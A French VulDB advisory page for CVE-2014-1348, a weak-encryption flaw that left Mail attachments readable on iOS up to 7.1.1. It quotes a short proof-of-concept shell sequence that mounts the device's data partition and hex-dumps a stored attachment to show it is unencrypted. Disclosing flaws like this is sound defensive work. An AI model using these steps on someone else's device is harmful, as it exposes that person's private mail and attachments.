Apple iOS jusqu’à 7.1.1 Email Attachment MobileMail.app chiffrement faible

CVSS Score méta-temporairePrix actuel de l'exploit (≈)Score d'intérêt CTI
3.3$0-$5k0.00

Résuméinformation

Une vulnérabilité classée comme problématique a été trouvée dans Apple iOS jusqu’à 7.1.1. Ceci affecte une fonction inconnue du fichier MobileMail.app du composant Email Attachment Handler. L’utilisation aboutit à chiffrement faible. Cette vulnérabilité est référencée sous CVE-2014-1348. De plus, un exploit est disponible.

Détailsinformation

Une vulnérabilité a été trouvé dans Apple iOS jusqu’à 7.1.1 (Smartphone Operating System) et classée problématique. Affecté est une fonction inconnue du fichier MobileMail.app du composant Email Attachment Handler. La manipulation avec une valeur d'entrée inconnue mène à une vulnérabilité de classe chiffrement faible.

La vulnerabilité a été publié en 23/04/2014 par Andreas Kurtz avec le numéro d'identification What Apple Missed to Fix in iOS 7.1.1 avec blog post (Website) (non défini). La notice d'information est disponible en téléchargement sur andreas-kurtz.de Le fabricant a coopéré. Cette vulnérabilité a été nommée CVE-2014-1348. La vulnerabilité est relativement populaire, et bien qu'elle soit très complexe. Un accés local est requis pour cette attaque. Une seule session d'authentification est nécéssaire pour l'exploitation. Des details techniques et un public exploit sont connus.

Un exploit a été developpé par Andreas Kurtz en Shell et a été publié immédiatement après la notice d'information. L'exploit est disponible au téléchargment sur andreas-kurtz.de. Il est déclaré comme preuve de concept. Le code utilisé par l'exploit est:

# mount_hfs /dev/disk0s1s2 /mnt2
# cd /mnt2/mobile/Library/Mail/

# xxd IMAP-MY_MAILADDRESS/INBOX.imapmbox/Attachments/4/2/my_file.pdf 
0000000: 2550 4446 2d31 2e34 0a25 81e2 81e3 81cf  %PDF-1.4.%......
0000010: 81d3 5c72 0a31 2030 206f 626a 0a3c 3c0a  ..\r.1 0 obj.<<.
0000020: 2f43 7265 6174 696f 6e44 6174 6520 2844  /CreationDate (D
0000030: 3a32 3031 3330 3830 3532 3034 3830 3329  :20130805204803)
0000040: 0a2f 4d6f 6444 6174 6520 2844 3a32 3031  ./ModDate (D:201
0000050: 3330 3830 3532 3034 3830 3329 0a2f 5469  30805204803)./Ti
0000060: 746c 6520 2852 2047 7261 7068 6963 7320  tle (R Graphics 
0000070: 4f75 7470 7574 290a 2f50 726f 6475 6365  Output)./Produce
0000080: 7220 2852 2033 2e30 2e31 290a 2f43 7265  r (R 3.0.1)./Cre
0000090: 6174 6f72 2028 5229 0a3e 3e0a 656e 646f  ator (R).>>.endo

Il n'y a aucune information à propos de possibles contremesures connues. Il est suggéré de remplacer l'object infecté par un produit alternatif.

La vulnérabilité est aussi documentée dans les base de données X-Force (93048), SecurityFocus (BID 67263†) et OSVDB (106668†). If you want to get best quality of vulnerability data, you may have to visit VulDB.

Pas affecté

  • Apple iOS jusqu’à 7.0.3

Produitinformation

Taper

Fournisseur

Nom

Version

Licence

Site web

CPE 2.3information

CPE 2.2information

CVSSv4information

VulDB Vecteur: 🔍
VulDB Fiabilité: 🔍

CVSSv3information

VulDB Score méta-base: 3.6
VulDB Score méta-temporaire: 3.3

VulDB Note de base: 3.6
VulDB Note temporaire: 3.3
VulDB Vecteur: 🔍
VulDB Fiabilité: 🔍

CVSSv2information

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VecteurComplexitéAuthentificationConfidentialitéIntégritéDisponibilité
DéverrouillerDéverrouillerDéverrouillerDéverrouillerDéverrouillerDéverrouiller
DéverrouillerDéverrouillerDéverrouillerDéverrouillerDéverrouillerDéverrouiller
DéverrouillerDéverrouillerDéverrouillerDéverrouillerDéverrouillerDéverrouiller

VulDB Note de base: 🔍
VulDB Note temporaire: 🔍
VulDB Fiabilité: 🔍

NVD Note de base: 🔍

Exploitationinformation

Classe: Chiffrement faible
CWE: CWE-310
CAPEC: 🔍
ATT&CK: 🔍

Physique: Partiellement
Local: Oui
Remote: Non

Disponibilité: 🔍
Accès: Public
Statut: Preuve de concept
Auteur: Andreas Kurtz
Langage de programmation: 🔍
Télécharger: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Prédiction de prix: 🔍
Estimation actuelle des prix: 🔍

0-DayDéverrouillerDéverrouillerDéverrouillerDéverrouiller
Aujourd'huiDéverrouillerDéverrouillerDéverrouillerDéverrouiller

Renseignements sur les menacesinformation

Intérêt: 🔍
Acteurs actifs: 🔍
Groupes APT actifs: 🔍

Contre-mesuresinformation

Recommandé: aucune mesure d'atténuation connue
Statut: 🔍

Heure 0 jour: 🔍
Délai d'exploitation: 🔍

Chronologieinformation

08/01/2014 🔍
23/04/2014 +105 jours 🔍
23/04/2014 +0 jours 🔍
06/05/2014 +13 jours 🔍
07/05/2014 +1 jours 🔍
01/07/2014 +55 jours 🔍
19/06/2021 +2545 jours 🔍

Sourcesinformation

Fournisseur: apple.com

Bulletin: What Apple Missed to Fix in iOS 7.1.1
Chercheur: Andreas Kurtz
Statut: Non défini
Confirmation: 🔍
Coordonné: 🔍

CVE: CVE-2014-1348 (🔍)
GCVE (CVE): GCVE-0-2014-1348
GCVE (VulDB): GCVE-100-13148

IAVM: 🔍

X-Force: 93048 - Apple MobileMail.app information disclosure, Low Risk
SecurityFocus: 67263 - Apple iOS 'MobileMail.app' Local Information Disclosure Vulnerability
OSVDB: 106668
SecurityTracker: 1030500

scip Labs: https://www.scip.ch/en/?labs.20150917
Divers: 🔍
Voir aussi: 🔍

Entréeinformation

Créé: 06/05/2014 17:33
Mise à jour: 19/06/2021 10:18
Changements: 06/05/2014 17:33 (81), 02/04/2019 09:36 (1), 19/06/2021 10:18 (4)
Complet: 🔍
Cache ID: 216:512:103

Discussion

Aucun commentaire pour l'instant. Langues: fr + it + en.

Veuillez vous connecter pour commenter.

PrécédentAperçuSuivant

Want to stay up to date on a daily basis?

Enable the mail alert feature now!